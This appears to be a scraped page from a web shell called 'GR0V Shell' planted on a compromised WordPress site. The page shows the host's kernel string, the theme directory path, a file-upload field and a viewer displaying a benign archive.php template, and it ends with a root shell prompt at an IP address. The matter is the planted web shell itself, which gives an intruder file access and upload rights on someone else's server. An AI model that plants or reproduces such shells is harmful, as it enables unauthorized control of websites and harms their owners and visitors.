? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.net/public_html/wp-content/themes/careta/
File Upload :
Current File : /home/admin/domains/happytokorea.net/public_html/wp-content/themes/careta/archive.php

<?php
	get_header();
	
	if(have_posts()) :
?>
		<div id="post">
			<div class="post-list-content">
				<h1><?php
					if ( is_day() ) :
						printf( __( 'Daily Archives: %s', 'careta' ), '<span>' . get_the_date() . '</span>' );
					elseif ( is_month() ) :
						echo __('Select Month') . ':';
						echo get_the_date( _x( 'F Y', 'monthly archives date format', 'careta' )   );
					elseif ( is_year() ) :
						printf( __( 'Yearly Archives: %s', 'careta' ), '<span>' . get_the_date( _x( 'Y', 'yearly archives date format', 'careta' ) ) . '</span>' );
					else :
						_e( 'Archives', 'careta' );
					endif;
				?></h1>
			</div>
		</div>
		
<?php
		get_template_part('content', 'postlist');

	else :
	
		get_template_part('content', 'none');
	
	endif;
	
	get_footer();
?>

T1KUS90T
  root-grov@210.1.60.28:~$